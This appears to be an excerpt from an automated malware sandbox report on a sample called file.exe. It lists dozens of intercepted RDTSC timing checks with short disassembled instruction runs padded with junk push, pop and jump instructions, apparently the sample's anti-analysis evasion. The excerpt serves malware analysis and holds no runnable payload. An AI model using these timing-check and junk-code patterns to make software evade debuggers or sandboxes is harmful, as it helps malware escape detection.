    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43418 second address: D4342A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F23E44F378Ch 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2246F second address: D22474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23489 second address: D23493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F23E44F3786h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25328 second address: D25331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25331 second address: D25335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2540A second address: D25410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D262F8 second address: D262FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4359E second address: D435A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4388E second address: D43893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43893 second address: D43899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43899 second address: D4389D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D439DE second address: D43A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E451539Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F23E4515398h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F23E4515396h 0x0000001a jmp 00007F23E45153A4h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43A13 second address: D43A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43A17 second address: D43A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48D10 second address: D48D47 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23E44F3786h 0x00000008 jl 00007F23E44F3786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 jmp 00007F23E44F378Ch 0x00000016 pop edx 0x00000017 jmp 00007F23E44F3794h 0x0000001c popad 0x0000001d push esi 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D083F7 second address: D083FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08643 second address: D08649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08814 second address: D0882C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jl 00007F23E45153A2h 0x00000010 js 00007F23E451539Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0882C second address: D08861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F23E44F3793h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F23E44F3793h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D089BB second address: D089C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08AEE second address: D08AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C4A second address: D08C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08C4E second address: D08C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09412 second address: D09416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09416 second address: D0941A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09504 second address: D0950E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0950E second address: D09513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09513 second address: D09525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F23E4515396h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09525 second address: CF2D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F23E44F3786h 0x0000000a popad 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F23E44F3788h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 or di, 7E72h 0x0000002c mov dword ptr [ebp+122D3483h], edi 0x00000032 call dword ptr [ebp+122D28A3h] 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DCF second address: D47DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DD3 second address: D47DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FAE second address: D47FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F23E4515396h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48296 second address: D4829A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48459 second address: D48477 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F23E4515396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F23E4515396h 0x00000014 jmp 00007F23E451539Ah 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48892 second address: D48896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48896 second address: D488B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F23E4515396h 0x0000000d je 00007F23E4515396h 0x00000013 jmp 00007F23E451539Ch 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F361 second address: D4F365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F365 second address: D4F373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F23E45153A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBE91 second address: CCBE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBE97 second address: CCBE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBE9C second address: CCBEBE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F23E44F378Ah 0x00000008 jns 00007F23E44F378Ah 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F23E44F37AFh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBEBE second address: CCBEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F23E4515396h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E249 second address: D4E24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E24F second address: D4E253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E253 second address: D4E25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E25B second address: D4E277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E45153A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F23E4515396h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E797 second address: D4E79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E79B second address: D4E79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4E79F second address: D4E7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F23E44F3786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F23E44F378Bh 0x00000012 jbe 00007F23E44F3786h 0x00000018 pop ecx 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F23E44F378Dh 0x00000020 push esi 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop esi 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EAB0 second address: D4EAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EAB6 second address: D4EAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EAC1 second address: D4EAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EAC7 second address: D4EACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EACC second address: D4EADF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F23E451539Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4EADF second address: D4EAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F23E44F3786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F204 second address: D4F213 instructions: 0x00000000 rdtsc 0x00000002 js 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BDF second address: D56BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F23E44F3793h 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D564AA second address: D564C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F23E451539Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D564C3 second address: D564C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D564C9 second address: D564D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F23E451539Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56637 second address: D5663C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D590BD second address: D590C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F23E4515396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D6C second address: D58D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F23E44F3786h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D76 second address: D58D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D7E second address: D58D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F23E44F378Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D8F second address: D58D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F23E4515396h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58D9B second address: D58DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F23E44F3786h 0x0000000d jnc 00007F23E44F3786h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DAE second address: D58DDA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F23E4515398h 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 jmp 00007F23E45153A1h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DDA second address: D58DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DDE second address: D58DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D58DE2 second address: D58DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D0C2 second address: D5D0C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D38C second address: D5D39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E44F378Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D39E second address: D5D3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D543 second address: D5D562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3795h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D562 second address: D5D575 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F23E4515396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F23E4515396h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D96A second address: D5D978 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F23E44F3786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D978 second address: D5D97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D97C second address: D5D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D988 second address: D5D98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6463A second address: D64640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D62FDB second address: D62FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F23E4515396h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63134 second address: D6313A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632AE second address: D632B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632B4 second address: D632EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F23E44F3795h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F23E44F3799h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632EC second address: D632F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632F3 second address: D632FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D632FC second address: D63300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63723 second address: D63730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63730 second address: D63734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08DFF second address: D08E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08E06 second address: D08E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08E0C second address: D08E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23E44F3790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e js 00007F23E44F3786h 0x00000014 mov ebx, dword ptr [ebp+12477F64h] 0x0000001a mov edx, dword ptr [ebp+122D2E0Fh] 0x00000020 add eax, ebx 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F23E44F3788h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c push edx 0x0000003d pushad 0x0000003e push ebx 0x0000003f pop esi 0x00000040 jp 00007F23E44F3786h 0x00000046 popad 0x00000047 pop edi 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08E67 second address: D08E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08E6B second address: D08EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F23E44F3788h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jmp 00007F23E44F378Eh 0x0000002b mov ecx, 3C186995h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 jmp 00007F23E44F3797h 0x00000039 pop ecx 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08EC4 second address: D08ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F23E4515396h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08ECE second address: D08ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D63988 second address: D63998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23E451539Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6755F second address: D67563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D67563 second address: D6756E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
